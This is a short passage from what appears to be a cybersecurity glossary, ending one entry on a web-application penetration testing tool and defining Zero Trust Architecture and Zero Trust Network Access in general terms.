An open-source penetration testing tool for finding vulnerabilities in web applications.
Zero Trust Architecture (ZTA)
A network architecture whereby the trust is removed, with an assumption made that it is a hostile environment where all requests are verified based on an access policy.
Zero Trust Network Access (ZTNA)
A solution that provides secure remote access to an organisation’s applications, data, and services based on clearly defined access control policies.